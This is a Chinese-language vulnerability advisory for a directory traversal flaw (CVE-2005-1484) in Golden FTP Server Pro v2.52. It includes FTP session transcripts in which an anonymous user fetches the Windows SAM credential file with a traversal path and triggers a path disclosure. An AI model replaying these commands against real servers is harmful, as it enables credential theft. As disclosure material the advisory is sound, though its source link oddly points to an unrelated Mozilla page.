Golden Ftp Server Pro目录遍历漏洞
发布日期:2005-05-08
更新日期:2005-05-08
受影响系统:KMiNT21 Golden FTP Server Pro v2.52
描述:
BUGTRAQ ID:
13479
CVE(CAN) ID:
CVE-2005-1484
Golden FTP Server是一款非常易用的Windows平台的个人FTP服务程序。
Golden FTP Server对于路径处理的实现上存在漏洞,远程攻击者可能执行目录遍历攻击。
任何用户都可能通过目录遍历序列绕过ftproot限制,访问任意文件。攻击者还可能通过请求不存在的文件泄漏共享路径。
<*来源:Lachlan. H (
pseudonym_ok@yahoo.com)
链接:
http://www.mozilla.org/security/announce/mfsa2005-42.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
C:\>ftp ********
Connected to **********
220 Golden FTP Server PRO ready v2.52
User (********:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> GET "\../winnt/repair/sam
200 PORT Command successful.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp: 24576 bytes received in 1.10Seconds
22.32Kbytes/sec.
ftp> !dir sam
Volume in drive C has no label.
Volume Serial Number is F4A5-2272
Directory of C:\
26/04/2005 11:30 AM 24,576 Sam
1 File(s) 24,576 bytes
0 Dir(s) 30,103,302,656 bytes free
ftp>
*
C:\>ftp ****
Connected to ****
220 Golden FTP Server PRO ready v2.52
User (******:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> get C:\blah
200 PORT Command successful.
550 Cannot open file C:\Temp\C:\blah
建议:
厂商补丁:
KMiNT21
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www[dot]goldenftpserver[dot]com/浏览次数:3563
严重程度:0(网友投票)